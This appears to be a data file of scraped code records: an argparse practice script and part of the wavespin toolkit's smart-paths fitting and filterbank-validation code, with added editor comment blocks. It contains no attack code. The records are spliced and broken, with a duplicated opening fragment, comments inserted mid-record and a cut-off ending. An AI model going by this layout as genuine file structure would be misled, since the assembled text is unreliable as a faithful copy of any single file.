parser.',\n epilog='End of message.',\n prefix_chars='+/-')\n\n# parser.add_argument('first_num', type=float, help='First num for add.')\n# parser.add_argument('second_num', type=float, help='Second num for add.')\n# parser.add_argument('string_arg', help='Second num for add.')\nparser.add_argument('-l', '--list', type=float, help='Optional l args', dest='whitelist')\nparser.add_argument('-v', '--verbosity', action='store_false', help='Optional v args')\nparser.add_argument('-q', '--quit', nargs=2, help='Optional q args')\nparser.add_argument('-w', '--web', nargs='?', default=34, const=23, help='Optional w args')\n\nparser.add_argument('-tp', '--type', choices={'basic', 'premium', 'simple'}, help='Optional tp args')\nparser.add_argument('-f', '--face', action='append', help='Optional v args')\nparser.add_argument('-z', '--zip', action='append_const', const=1, help='Optional v args', dest='zc')\nparser.add_argument('-c', '--cut', action='append_const', const=2, help='Optional v args', dest='zc')\n\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument('-t', '--take', nargs='*', default=[1], help='Optional t args')\ngroup.add_argument('-e', '--exit', nargs='+', default=[1], help='Optional e args')\n\nsubparsers = 
{"seq_id":"74014262179","text":"import argparse\n\nparser = argparse.ArgumentParser(prog='ArgTry',\n                                 usage='%(prog)s [options]',\n                                 description='Description for command parser.',\n                                 epilog='End of message.',\n                                 prefix_chars='+/-')\n\n# parser.add_argument('first_num', type=float, help='First num for add.')\n# parser.add_argument('second_num', type=float, help='Second num for add.')\n# parser.add_argument('string_arg', help='Second num for add.')\nparser.add_argument('-l', '--list', type=float, help='Optional l args', dest='whitelist')\nparser.add_argument('-v', '--verbosity', action='store_false', help='Optional v args')\nparser.add_argument('-q', '--quit', nargs=2, help='Optional q args')\nparser.add_argument('-w', '--web', nargs='?', default=34, const=23, help='Optional w args')\n\nparser.add_argument('-tp', '--type', choices={'basic', 'premium', 'simple'}, help='Optional tp args')\nparser.add_argument('-f', '--face', action='append', help='Optional v args')\nparser.add_argument('-z', '--zip', action='append_const', const=1, help='Optional v args', dest='zc')\nparser.add_argument('-c', '--cut', action='append_const', const=2, help='Optional v args', dest='zc')\n\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument('-t', '--take', nargs='*', default=[1], help='Optional t args')\ngroup.add_argument('-e', '--exit', nargs='+', default=[1], help='Optional e args')\n\nsubparsers = parser.add_subparsers()\nparser_sub = subparsers.add_parser('div')\nparser_sub.add_argument('first_n', type=float, help='first num help div')\nparser_sub.add_argument('second_n', type=float, help='second num help div')\n\n\nargs = parser.parse_args()\n\n# first_n/second_n only exist on the namespace when the 'div' subcommand was used;\n# unguarded access raised AttributeError for every other invocation\nif hasattr(args, 'first_n'):\n    print(args.first_n/args.second_n)\n\n# print(args.first_num)\n# print(args.whitelist)\n# print(args.first_num+args.second_num)\nprint(args.__dict__)\n\n\nparent_parser = argparse.ArgumentParser(prog='parent', description='description for parent', add_help=False)\n\nparent_parser.add_argument('path', help='help str for path')\n\n\nparser_1 = argparse.ArgumentParser(prog='parser_1', description='Parser_1 description', parents=[parent_parser])\nparser_1.add_argument('-a', type=int, help='help str for -a')\n\nargs_1 = parser_1.parse_args(['path/to/file_1', '-a', '1'])\n# print(args_1.__dict__)\n\nparser_2 = argparse.ArgumentParser(prog='parser_2', description='Parser_2 description', parents=[parent_parser])\nparser_2.add_argument('-s', type=int, help='help str for -s')\nargs_2 = parser_2.parse_args(['path/to/file_2', '-s', '1'])\n# print(args_2.__dict__)","repo_name":"VachaganGrigoryan/aca-python","sub_path":"sunday-morning-main/28_02_21/argparse_try.py","file_name":"argparse_try.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
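# ---------------------------------------------------------------------------
# Editor's example (not part of the dataset record above): the argparse script
# crashed when run without the 'div' subcommand, because subparser arguments
# only exist on the namespace once that subparser matched. The standard-library
# pattern that avoids per-attribute hasattr checks is to bind a handler per
# subcommand with `set_defaults`; names below are illustrative.
import argparse


def run_div(ns):
    print(ns.first_n / ns.second_n)


top = argparse.ArgumentParser(prog='ArgTry2')
subs = top.add_subparsers(dest='command')
div = subs.add_parser('div')
div.add_argument('first_n', type=float)
div.add_argument('second_n', type=float)
div.set_defaults(func=run_div)

ns = top.parse_args(['div', '10', '4'])
if hasattr(ns, 'func'):   # no subcommand given -> no handler bound
    ns.func(ns)           # prints 2.5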
{"seq_id":"41585547392","text":"import os\nimport numpy as np\nimport scipy.signal\nimport warnings\nfrom scipy.fft import fft, ifft\n\nfrom ...scattering1d.refining import smart_paths_exclude\nfrom ...scattering1d.frontend.frontend_utils import _check_jax_double_precision\nfrom ...utils.gen_utils import npy\nfrom ...utils.measures import compute_filter_redundancy, compute_bandwidth\nfrom .misc import energy\n\ntry:\n    from tqdm import trange\nexcept:  # no-cov\n    trange = None\n\n\ndef fit_smart_paths(sc, x_all, e_loss_goal=.01, outs_dir=None, verbose=True):\n    \"\"\"Configures `paths_exclude` to guarantee energy loss doesn't exceed set\n    threshold on the provided dataset.\n\n    Iterates `x_all` and dynamically adjusts `e_th` that's passed into\n    `smart_paths()`, refining estimates to match `e_loss_goal`.\n\n    Note, ignores existing `sc.paths_exclude`. If execution is forcibly\n    interrupted repeatedly, the following attributes will be overwritten:\n    `paths_exclude, out_type`. By default, the program will restore\n    them to original values even upon interruption via `try-finally`.\n\n    Parameters\n    ----------\n    sc : Scattering1D\n        Time Scattering instance.\n\n        Use to also compute for JTFS, by instantiating with same time scattering\n        params (`J`, `Q`, etc). See \"JTFS example\" below.\n\n    x_all : tensor / list[tensor] / generator\n        List of 1D tensors, 2D tensor shaped `(n_samples, time)`,\n        or a generator (see \"Generator example\" below).\n\n        For machine learning, this should *not* include samples from the test\n        set; that leaks the test set. If one wants to be safe, a slightly\n        smaller `e_loss_goal` can be chosen.\n\n    e_loss_goal : float[>0, <1]\n        Energy loss goal; this shall not be exceeded by `sc` over `x_all`.\n\n    outs_dir : str / None\n        Path to pre-computed full transform's outputs.\n        See \"Performance tip\" below.\n\n    verbose : bool (default True)\n        Whether to print progress reports.\n\n    Returns\n    -------\n    e_th_optimal_est : float\n        Optimal `e_th` as passed to `smart_paths()`, as estimated by the\n        search procedure.\n\n        The output of such `smart_paths()` is already set to `sc.paths_exclude`,\n        so this output can be discarded.\n\n    Performance tip\n    ---------------\n    Simply use `outs_dir` as below; only a single pass over the dataset will take\n    place. Requires `out_type='array'`.\n\n    ::\n        wavespin.toolkit._compute_e_fulls(sc, x_all, outs_dir)\n        fit_smart_paths(..., outs_dir=outs_dir)\n\n    JTFS example\n    ------------\n    ::\n        jtfs = TimeFrequencyScattering1D(2048)\n        sc = Scattering1D(**{k: getattr(jtfs, k) for k in\n                             ('shape', 'J', 'Q', 'T', 'max_pad_factor')})\n        fit_smart_paths(sc, x_all)\n\n    Generator example\n    -----------------\n    Must supply `__getitem__` and `__len__` methods.\n    Below loads numpy arrays from a directory.\n\n    ::\n        class MyGen():\n            def __init__(self, directory):\n                from pathlib import Path\n                self.paths = [p for p in Path(directory).iterdir()\n                              if p.suffix == '.npy']\n\n            def __getitem__(self, idx):\n                if idx >= len(self):  # needed if method doesn't throw IndexError\n                    raise IndexError  # so here not needed per `paths[idx]`\n                return np.load(self.paths[idx])\n\n            def __len__(self):\n                return len(self.paths)\n\n        x_all = MyGen(r\"C:/Desktop/my_data//\")\n\n    JTFS vs Scattering1D\n    --------------------\n    Scattering1D enjoys the property, `e_loss(e_th1) >= e_loss(e_th2)`, for all\n    `e_th1 >= e_th2` and `x`. This means we can find the right `e_th` for a\n    given `e_loss` from a single pass over the dataset:\n\n        1. Start with high `e_th`.\n        2. If new `x` violates `e_loss`, lower `e_th`. This `e_th` is guaranteed\n           to not violate `e_loss` for any preceding `x` due to said property:\n           the energy loss for those `x` can only go *lower* from lowering `e_th`.\n        3. Repeat for all `x`. The final `e_th` is the optimal `e_th`, within\n           the search increment (currently `e_th *= .99`).\n\n    JTFS doesn't enjoy this property. Changing the number of first-order rows\n    for any given `n2` has non-linear interactions with second-order coefficients\n    - namely, it changes the length of convolution and potentially padding, so\n    *fewer* `n1`'s may *increase* joint coefficients' energies. This is probable\n    with `pad_mode_fr='zero'`, but not with `'conj-reflect-zero'`, as the latter\n    strives for energy conservation.\n\n    Arguably, it's better to use Scattering1D to compute for JTFS. Ideally, JTFS\n    second-order energy equals Scattering1D second-order energy, hence we can\n    use one to get the other - but ideal doesn't work per above, and the\n    differences are sometimes meaningful. If we decide they aren't meaningful,\n    then Scattering1D provides true energy loss measures.\n\n    Why isn't JTFS directly supported?\n    ----------------------------------\n    Implementation and testing complexity are too great given the benefits.\n    Also quite slow.\n\n    Originally this method supported all but one thing JTFS needed: it required\n    completely re-instantiating JTFS with its original configurations each time\n    `paths_exclude` was updated, so one would have to pass in the configs or\n    they'd need to be fetched automatically. 
This isn't that hard but it is quite\n slow and with everything else requires a fair bit of testing code.\n \"\"\"\n # wrap in `try-finally` to restore changed parameters\n pe = sc.paths_exclude.copy()\n ot = sc.out_type\n try:\n sc.out_type = 'array'\n out = _fit_smart_paths(sc, x_all, e_loss_goal, outs_dir, verbose)\n finally:\n sc.out_type = ot\n sc.paths_exclude.update(pe)\n return out\n\n\ndef _fit_smart_paths(sc, x_all, e_loss_goal, outs_dir, verbose):\n # handle args ############################################################\n # sanity checks\n if hasattr(x_all, 'ndim'):\n assert x_all.ndim == 2, x_all.shape\n elif isinstance(x_all, list):\n assert all(x.ndim == 1 for x in x_all)\n assert 0 < e_loss_goal < 1, e_loss_goal\n\n # prepare to loop ########################################################\n # first collect full transform's energies\n if outs_dir is not None:\n e_fulls = np.load(os.path.join(outs_dir, 'e_fulls.npy'))\n if verbose:\n print(\"Using pre-computed `e_fulls`...\")\n else:\n e_fulls = _compute_e_fulls(sc, x_all, verbose=verbose)\n\n # initialize paths_exclude to a high since we'll only be lowering it\n e_th_pseudo_max = .5\n e_th_init = e_th_pseudo_max\n sc.paths_exclude = smart_paths_exclude(sc.psi1_f, sc.psi2_f,\n e_th_direct=e_th_init)\n\n # main loop ##############################################################\n e_th_optimal_est = _compute_e_losses(\n sc, x_all, e_fulls, e_th_init, e_loss_goal, e_th_pseudo_max, outs_dir,\n verbose)\n return e_th_optimal_est\n\n\ndef _compute_e_losses(sc, x_all, e_fulls, e_th_init, e_loss_goal=-1,\n e_th_pseudo_max=.5, outs_dir=None, verbose=1):\n # maybe print status\n if verbose:\n print(\"Optimizing energy threshold for e_loss_goal=%.3g...\" % e_loss_goal)\n\n # derived params\n ckw = dict(psi1_f=sc.psi1_f, psi2_f=sc.psi2_f)\n if outs_dir is not None:\n outs_dir = os.path.abspath(outs_dir) # for debug\n # get full meta then restore paths\n sp, sc.paths_exclude = sc.paths_exclude, {}\n ns_full = sc.meta()['n']\n sc.paths_exclude = sp\n\n # reusable\n def compute_e_loss(idx, e_th_current, x=None, update_paths=False):\n if update_paths:\n sp = smart_paths_exclude(**ckw, e_th_direct=e_th_current)\n sc.paths_exclude = sp\n\n # either get `x` and scatter, or load precomputed output and trim it\n if outs_dir is not None:\n out = np.load(os.path.join(outs_dir, f'{idx}.npy'))\n if out.ndim == 2:\n out = out[None] # add batch dim if absent\n out = out.transpose(1, 0, 2) # prep for iterating coefficients\n\n out_sp = []\n for row, n in zip(out, ns_full):\n if tuple(n) not in sc.paths_exclude['n2, n1']:\n out_sp.append(row)\n out_sp = np.array(out_sp).transpose(1, 0, 2)\n\n # assert expected shapes, as we reasonably can\n A = len(out) - out_sp.shape[1]\n B = len(sc.paths_exclude['n2, n1'])\n assert A == B, (A, B, out.shape, out_sp.shape)\n else:\n if x is None:\n x = x_all[idx]\n x = x[None] if x.ndim == 1 else x # add batch dim if absent\n out_sp = sc(x)\n\n # compute energy and corresponding loss\n e_sp = samples_energy(out_sp)\n e_loss = 1 - npy(e_sp) / e_fulls[idx]\n\n return e_loss, x\n\n # track thresholds and obtained losses\n e_th_current = e_th_init\n e_ths_all = [e_th_current]\n # loop params\n ranger = _get_ranger(verbose)\n\n e_losses = []\n\n # pass loop ##########################################################\n # Scattering1D: `e_th_current` is only lowered inside this loop, and upon\n # lowering, the value is checked to not violate `e_loss_goal`, so whatever\n # its final loop value is, it's guaranteed to not 
violate `e_loss_goal`.\n    for i in ranger(len(x_all)):\n        e_loss, x = compute_e_loss(i, e_th_current)\n\n        # if loss exceeds goal, lower e_th_current\n        if any(el > e_loss_goal for el in e_loss):\n            # check that it doesn't violate `e_loss_goal`, and if it does,\n            # adjust lightly until it no longer does so\n            eloss, _ = compute_e_loss(i, e_th_current, x, update_paths=True)\n            while any(el > e_loss_goal for el in eloss):\n                e_th_current *= .99\n                eloss, _ = compute_e_loss(i, e_th_current, x,\n                                          update_paths=True)\n            # track\n            e_ths_all.append(e_th_current)\n\n        e_losses.append(e_loss)\n    e_th_loop_out = e_th_current\n\n    # finalize ###############################################################\n    e_th_optimal_est = e_th_loop_out\n    sc.paths_exclude = smart_paths_exclude(**ckw, e_th_direct=e_th_optimal_est)\n    return e_th_optimal_est\n\n\ndef _compute_e_fulls(sc, x_all, outs_dir=None, verbose=1):\n    if outs_dir is not None:\n        outs_dir = os.path.abspath(outs_dir)\n    if verbose:\n        if outs_dir is None:\n            print(\"Gathering full transform's energies...\")\n        else:\n            print(\"Gathering full transform's energies, and saving in\\n\"\n                  + outs_dir)\n    ranger = _get_ranger(verbose)\n\n    e_fulls = []\n    sp, sc.paths_exclude = sc.paths_exclude, {}\n    for idx in ranger(len(x_all)):\n        x = x_all[idx]\n        x = x[None] if x.ndim == 1 else x\n        out = sc(x)\n        e_out = samples_energy(out)\n        e_fulls.append(e_out)\n        if outs_dir is not None:\n            np.save(os.path.join(outs_dir, f'{idx}.npy'), npy(out))\n    sc.paths_exclude = sp\n\n    if verbose:\n        print(\"... done\\n\")\n\n    e_fulls = npy(e_fulls)\n    if e_fulls.ndim == 1:\n        e_fulls = e_fulls[:, None]\n    if outs_dir is not None:\n        np.save(os.path.join(outs_dir, 'e_fulls.npy'), e_fulls)\n    return e_fulls\n\n\ndef samples_energy(x):\n    \"\"\"(batch_size, *spatial) -> (batch_size,)\"\"\"\n    return energy(x, axis=tuple(range(1, x.ndim)))\n\n#### Validating 1D filterbank ################################################\ndef validate_filterbank_tm(sc=None, psi1_f=None, psi2_f=None, phi_f=None,\n                           criterion_amplitude=1e-3, verbose=True):\n    \"\"\"Runs `validate_filterbank()` on temporal filters; supports `Scattering1D`\n    and `TimeFrequencyScattering1D`.\n\n    Parameters\n    ----------\n    sc : `Scattering1D` / `TimeFrequencyScattering1D` / None\n        If None, then `psi1_f`, `psi2_f`, and `phi_f` must\n        not be None.\n\n    psi1_f : list[tensor] / None\n        First-order bandpasses in frequency domain.\n        Overridden if `sc` is not None.\n\n    psi2_f : list[tensor] / None\n        Second-order bandpasses in frequency domain.\n        Overridden if `sc` is not None.\n\n    phi_f : tensor / None\n        Lowpass filter in frequency domain.\n        Overridden if `sc` is not None.\n\n    criterion_amplitude : float\n        Used for various thresholding in `validate_filterbank()`.\n\n    verbose : bool (default True)\n        Whether to print the report.\n\n    Returns\n    -------\n    data1, data2 : dict, dict\n        Returns from `validate_filterbank()` for `psi1_f` and `psi2_f`.\n    \"\"\"\n    if sc is None:  # no-cov\n        assert not any(arg is None for arg in (psi1_f, psi2_f, phi_f))\n    else:\n        psi1_f, psi2_f, phi_f = [getattr(sc, k) for k in\n                                 ('psi1_f', 'psi2_f', 'phi_f')]\n    psi1_f, psi2_f = [[p[0] for p in ps] for ps in (psi1_f, psi2_f)]\n    phi_f = phi_f[0][0] if isinstance(phi_f[0], list) else phi_f[0]\n\n    if verbose:  # no-cov\n        print(\"\\n// FIRST-ORDER\")\n    data1 = validate_filterbank(psi1_f, phi_f, criterion_amplitude,\n                                verbose=verbose,\n                                for_real_inputs=True, unimodal=True)\n    if verbose:  # no-cov\n        print(\"\\n\\n// SECOND-ORDER\")\n    data2 = validate_filterbank(psi2_f, phi_f, criterion_amplitude,\n                                verbose=verbose,\n                                for_real_inputs=True, unimodal=True)\n    return data1, data2\n
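# ---------------------------------------------------------------------------
# Editor's example (not part of the source file above): intended entry point for
# the wrapper just defined -- build a scattering instance and let it pull
# `psi1_f`/`psi2_f`/`phi_f` out of it. The top-level import path and the `J`/`Q`
# values are illustrative assumptions, not prescribed by this module;
# `validate_filterbank_tm` itself is defined above.
#
# from wavespin import Scattering1D
#
# sc = Scattering1D(2048, J=8, Q=8)
# data1, data2 = validate_filterbank_tm(sc, verbose=False)
# print(data1['report'] or "first-order filterbank passed all checks")
# print(len(data2['redundancy']), "second-order adjacent-pair redundancies measured")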
\n\ndef validate_filterbank_fr(sc=None, psi1_f_fr_up=None, psi1_f_fr_dn=None,\n                           phi_f_fr=None, psi_id=0, criterion_amplitude=1e-3,\n                           verbose=True):\n    \"\"\"Runs `validate_filterbank()` on frequential filters of JTFS.\n\n    Parameters\n    ----------\n    sc : `TimeFrequencyScattering1D` / None\n        JTFS instance. If None, then `psi1_f_fr_up`, `psi1_f_fr_dn`, and\n        `phi_f_fr` must not be None.\n\n    psi1_f_fr_up : list[tensor] / None\n        Spin up bandpasses in frequency domain.\n        Overridden if `sc` is not None.\n\n    psi1_f_fr_dn : list[tensor] / None\n        Spin down bandpasses in frequency domain.\n        Overridden if `sc` is not None.\n\n    phi_f_fr : tensor / None\n        Lowpass filter in frequency domain.\n        Overridden if `sc` is not None.\n\n    psi_id : int\n        See `psi_id` in `filter_bank_jtfs.psi_fr_factory`.\n\n    criterion_amplitude : float\n        Used for various thresholding in `validate_filterbank()`.\n\n    verbose : bool (default True)\n        Whether to print the report.\n\n    Returns\n    -------\n    data_up, data_dn : dict, dict\n        Returns from `validate_filterbank()` for `psi1_f_fr_up` and\n        `psi1_f_fr_dn`.\n    \"\"\"\n    if sc is None:  # no-cov\n        assert not any(arg is None for arg in\n                       (psi1_f_fr_up, psi1_f_fr_dn, phi_f_fr))\n    else:\n        psi1_f_fr_up, psi1_f_fr_dn, phi_f_fr = [\n            getattr(sc, k) for k in\n            ('psi1_f_fr_up', 'psi1_f_fr_dn', 'phi_f_fr')]\n\n    psi1_f_fr_up, psi1_f_fr_dn = psi1_f_fr_up[psi_id], psi1_f_fr_dn[psi_id]\n    phi_f_fr = phi_f_fr[0][0][0]\n\n    if verbose:  # no-cov\n        print(\"\\n// SPIN UP\")\n    data_up = validate_filterbank(psi1_f_fr_up, phi_f_fr, criterion_amplitude,\n                                  verbose=verbose,\n                                  for_real_inputs=False, unimodal=True)\n    if verbose:  # no-cov\n        print(\"\\n\\n// SPIN DOWN\")\n    data_dn = validate_filterbank(psi1_f_fr_dn, phi_f_fr, criterion_amplitude,\n                                  verbose=verbose,\n                                  for_real_inputs=False, unimodal=True)\n    return data_up, data_dn\n\n\ndef validate_filterbank(psi_fs, phi_f=None, criterion_amplitude=1e-3,\n                        for_real_inputs=True, unimodal=True, is_time_domain=False,\n                        verbose=True):\n    \"\"\"Checks whether the wavelet filterbank is well-behaved against several\n    criteria:\n\n    1. Analyticity:\n\n      - A: Whether analytic *and* anti-analytic filters are present\n        (input should contain only one)\n      - B: Extent of (anti-)analyticity - whether there are components\n        on other side of Nyquist\n      - C: Whether the Nyquist bin is halved\n\n    2. Aliasing:\n\n      - A. Whether peaks are sorted (left to right or right to left).\n        If not, it's possible aliasing (or sloppy user input).\n      - B. Whether peaks are distributed exponentially or linearly.\n        If neither, it's possible aliasing. (Detection isn't foolproof.)\n\n    3. Zero-mean: whether filters are zero-mean (in time domain)\n\n    4. Zero-phase: whether filters are zero-phase\n\n    5. Frequency coverage: whether filters capture every frequency,\n       and whether they do so excessively or insufficiently.\n\n         - Measured with Littlewood-Paley sum (sum of energies),\n           the \"energy transfer function\".\n         - Also measured with sum of LP sum, in case of imperfect\n           analyticity not being accounted for (must fold leaked frequencies,\n           see `help(toolkit.compute_lp_sum)`, `fold_antianalytic`).\n\n    6. Frequency-bandwidth tiling: whether upper quarters of frequencies\n       follow CQT (fixed `xi/sigma = (center freq) / bandwidth`), and\n       whether all wavelet peak frequencies are distributed either\n       exponentially or linearly.\n\n       Only upper quarters (i.e. not `0 to N//4`) are checked for CQT because\n
       the non-CQT portion could be in the majority, but it is unlikely to\n       ever span the upper half.\n\n    7. Redundancy: whether filters overlap excessively (this isn't\n       necessarily bad).\n\n         - Measured as ratio of product of energies to sum of energies\n           of adjacent filters\n         - Also measured as peak duplication in frequency domain. Note,\n           it's possible to exceed the redundancy threshold without duplicating\n           peaks, and vice versa (but the latter is more difficult).\n\n    8. Decay:\n\n         - A: Whether any filter is a pure sine (occurs if we try to sample\n           a wavelet at too low of a center frequency)\n         - B: Whether filters decay sufficiently in time domain to avoid\n           boundary effects\n         - C: Whether filters decay sufficiently in frequency domain\n           (bandwidth isn't the entire signal), and whether they decay\n           permanently (don't rise again after decaying)\n\n       B may fail for the same reason as 9A & 9B (see these).\n\n    9. Temporal peaks:\n\n         - A: Whether peak is at t==0\n         - B: Whether there is only one peak\n         - C: Whether decay is smooth (else will incur inflection points)\n\n       A and B may fail to hold for lowest xi due to Morlet's corrective\n       term; this is proper behavior.\n       See https://www.desmos.com/calculator/ivd7t3mjn8\n\n    Parameters\n    ----------\n    psi_fs : list[tensor]\n        Wavelet filterbank, by default in frequency domain (if in time domain,\n        set `is_time_domain=True`).\n        Analytic or pseudo-analytic, or anti- of either; does not support\n        real-valued wavelets (in time domain).\n\n        If `psi_fs` aren't all same length, will pad in time domain and\n        center about `n=0` (DFT-symmetrically), with original length's center\n        placed at index 0.\n\n        Note, if `psi_fs` are provided in time domain or aren't all same length,\n        they're padded such that FFT convolution matches\n        `np.convolve(, mode='full')`. If wavelets are properly centered for FFT\n        convolution - that is, either at `n=0` or within `ifftshift` of `n=0`,\n        then for even lengths, `np.convolve` *will not* produce correct\n        results - which is what happens with `scipy.cwt`.\n\n    phi_f : tensor\n        Lowpass filter in frequency domain, of same length as `psi_fs`.\n\n    criterion_amplitude : float\n        Used for various thresholding.\n\n    for_real_inputs : bool (default True)\n        Whether the filterbank is intended for real-only inputs.\n        E.g. `False` for spinned bandpasses in JTFS.\n\n    unimodal : bool (default True)\n        Whether the wavelets have a single peak in frequency domain.\n        If `False`, some checks are omitted, and others might be inaccurate.\n        Always `True` for Morlet wavelets.\n\n    is_time_domain : bool (default False)\n        Whether `psi_fs` are in time domain. See notes in `psi_fs`.\n\n    verbose : bool (default True)\n        Whether to print the report.\n\n    Returns\n    -------\n    data : dict\n        Aggregated testing info, along with the report. For keys, see\n        `print(list(data))`. Note, for entries that describe individual filters,\n        the indexing corresponds to `psi_fs` sorted in order of decreasing\n        peak frequency.\n    \"\"\"\n    def pop_if_no_header(report, did_atleast_one_header):\n        \"\"\"`did_atleast_one_header` is reset to `False` after every `title()` call,\n        whereas `did_header` is reset before every subsection, i.e. before a possible\n        `if not did_header: report += []`. 
Former is to pop titles, latter\n is to avoid repeatedly appending subsection text.\n \"\"\"\n if not did_atleast_one_header:\n report.pop(-1)\n\n # handle `psi_fs` domain and length ######################################\n # squeeze all for convenience\n psi_fs = [p.squeeze() for p in psi_fs]\n # fetch max length\n max_len = max(len(p) for p in psi_fs)\n\n # take to freq or pad to max length\n _psi_fs = [] # store processed filters\n # also handle lowpass\n if phi_f is not None:\n psi_fs.append(phi_f)\n\n for p in psi_fs:\n if len(p) != max_len:\n if not is_time_domain:\n p = ifft(p)\n # right-pad\n orig_len = len(p)\n p = np.pad(p, [0, max_len - orig_len])\n # odd case: circularly-center about n=0; equivalent to `ifftshift`\n # even case: center such that first output index of FFT convolution\n # corresponds to `sum(x, p[::-1][-len(p)//2:])`, where `p` is in\n # time domain. This is what `np.convolve` does, and it's *not*\n # equivalent to FFT convolution after `ifftshift`\n center_idx = orig_len // 2\n p = np.roll(p, -(center_idx - 1))\n # take to freq-domain\n p = fft(p)\n elif is_time_domain:\n center_idx = len(p) // 2\n p = np.roll(p, -(center_idx - 1))\n p = fft(p)\n _psi_fs.append(p)\n psi_fs = _psi_fs\n # recover & detach phi_f\n if phi_f is not None:\n phi_f = psi_fs.pop(-1)\n\n ##########################################################################\n\n # set reference filter\n psi_f_0 = psi_fs[0]\n # fetch basic metadata\n N = len(psi_f_0)\n\n # assert all inputs are same length\n # note, above already guarantees this, but we keep the code logic in case\n # something changes in the future\n for n, p in enumerate(psi_fs):\n assert len(p) == N, (len(p), N)\n if phi_f is not None:\n assert len(phi_f) == N, (len(phi_f), N)\n\n # initialize report\n report = []\n data = {k: {} for k in ('analytic_a_ratio', 'nonzero_mean', 'sine', 'decay',\n 'imag_mean', 'time_peak_idx', 'n_inflections',\n 'redundancy', 'peak_duplicates')}\n data['opposite_analytic'] = []\n\n def title(txt):\n return (\"\\n== {} \" + \"=\" * (80 - len(txt)) + \"\\n\").format(txt)\n # for later\n w_pos = np.linspace(0, N//2, N//2 + 1, endpoint=True).astype(int)\n w_neg = - w_pos[1:-1][::-1]\n w = np.hstack([w_pos, w_neg])\n eps = np.finfo(psi_f_0.dtype).eps\n\n peak_idxs = np.array([np.argmax(np.abs(p)) for p in psi_fs])\n peak_idxs_sorted = np.sort(peak_idxs)\n if unimodal and not (np.all(peak_idxs == peak_idxs_sorted) or\n np.all(peak_idxs == peak_idxs_sorted[::-1])):\n warnings.warn(\"`psi_fs` peak locations are not sorted; a possible reason \"\n \"is aliasing. Will sort, breaking mapping with input's.\")\n data['not_sorted'] = True\n peak_idxs = peak_idxs_sorted\n\n # Analyticity ############################################################\n # check if there are both analytic and anti-analytic bandpasses ##########\n report += [title(\"ANALYTICITY\")]\n did_header = did_atleast_one_header = False\n\n peak_idx_0 = np.argmax(psi_f_0)\n if peak_idx_0 == N // 2: # ambiguous case; check next filter\n peak_idx_0 = np.argmax(psi_fs[1])\n analytic_0 = bool(peak_idx_0 < N//2)\n # assume entire filterbank is per psi_0\n analyticity = \"analytic\" if analytic_0 else \"anti-analytic\"\n\n # check whether all is analytic or anti-analytic\n found_counteranalytic = False\n for n, p in enumerate(psi_fs[1:]):\n peak_idx_n = np.argmax(np.abs(p))\n analytic_n = bool(peak_idx_n < N//2)\n if not (analytic_0 is analytic_n):\n if not did_header:\n report += [(\"Found analytic AND anti-analytic filters in same \"\n \"filterbank! 
psi_fs[0] is {}, but the following \"\n \"aren't:\\n\").format(analyticity)]\n did_header = did_atleast_one_header = True\n report += [f\"psi_fs[{n}]\\n\"]\n data['opposite_analytic'].append(n)\n found_counteranalytic = True\n\n # set `is_analytic` based on which there are more of\n if not found_counteranalytic:\n is_analytic = analytic_0\n else:\n n_analytic = sum(np.argmax(np.abs(p)) <= N//2 for p in psi_fs)\n n_antianalytic = sum(np.argmax(np.abs(p)) >= N//2 for p in psi_fs)\n if n_analytic > n_antianalytic or n_analytic == n_antianalytic:\n is_analytic = True\n else:\n is_analytic = False\n report += [(\"\\nIn total, there are {} analytic and {} anti-analytic \"\n \"filters\\n\").format(n_analytic, n_antianalytic)]\n\n # determine whether the filterbank is strictly analytic/anti-analytic\n if is_analytic:\n negatives_all_zero = False\n for p in psi_fs:\n # exclude Nyquist as it's both in analytic and anti-analytic\n if not np.allclose(p[len(p)//2 + 1:], 0.):\n break\n else:\n negatives_all_zero = True\n strict_analyticity = negatives_all_zero\n else:\n positives_all_zero = False\n for p in psi_fs:\n # exclude DC, one problem at a time; exclude Nyquist\n if not np.allclose(p[1:len(p)//2], 0.):\n break\n else:\n positives_all_zero = True\n strict_analyticity = positives_all_zero\n\n # determine whether the Nyquist bin is halved\n if strict_analyticity:\n did_header = False\n pf = psi_fs[0]\n if is_analytic:\n nyquist_halved = bool(pf[N//2 - 1] / pf[N//2] > 2)\n else:\n nyquist_halved = bool(pf[N//2 + 1] / pf[N//2] > 2)\n if not nyquist_halved:\n report += [(\"Nyquist bin isn't halved for strictly analytic wavelet; \"\n \"yields improper analyticity with bad time decay.\\n\")]\n did_header = did_atleast_one_header = True\n\n # check if any bandpass isn't strictly analytic/anti- ####################\n did_header = False\n th_ratio = (1 / criterion_amplitude)\n for n, p in enumerate(psi_fs):\n ap = np.abs(p)\n # assume entire filterbank is per psi_0\n if is_analytic:\n # Nyquist is *at* N//2, so to include in sum, index up to N//2 + 1\n a_ratio = (ap[:N//2 + 1].sum() / (ap[N//2 + 1:].sum() + eps))\n else:\n a_ratio = (ap[N//2:].sum() / (ap[:N//2].sum() + eps))\n if a_ratio < th_ratio:\n if not did_header:\n report += [(\"\\nFound not strictly {} filter(s); threshold for \"\n \"ratio of `spectral sum` to `spectral sum past \"\n \"Nyquist` is {} - got (less is worse):\\n\"\n ).format(analyticity, th_ratio)]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}]: {:.1f}\\n\".format(n, a_ratio)]\n data['analytic_a_ratio'][n] = a_ratio\n\n # check if any bandpass isn't zero-mean ##################################\n pop_if_no_header(report, did_atleast_one_header)\n report += [title(\"ZERO-MEAN\")]\n did_header = did_atleast_one_header = False\n\n for n, p in enumerate(psi_fs):\n if p[0] != 0:\n if not did_header:\n report += [\"Found non-zero mean filter(s)!:\\n\"]\n did_header = did_atleast_one_header = True\n report += [\"psi_fs[{}][0] == {:.2e}\\n\".format(n, p[0])]\n data['nonzero_mean'][n] = p[0]\n\n # Littlewood-Paley sum ###################################################\n def report_lp_sum(report, phi):\n with_phi = not isinstance(phi, int)\n s = \"with\" if with_phi else \"without\"\n report += [title(\"LP-SUM (%s phi)\" % s)]\n did_header = did_atleast_one_header = False\n\n # compute parameters #################################################\n # finish computing lp sum\n lp_sum = lp_sum_psi + np.abs(phi)**2\n lp_sum = (lp_sum[:N//2 + 1] if is_analytic else\n 
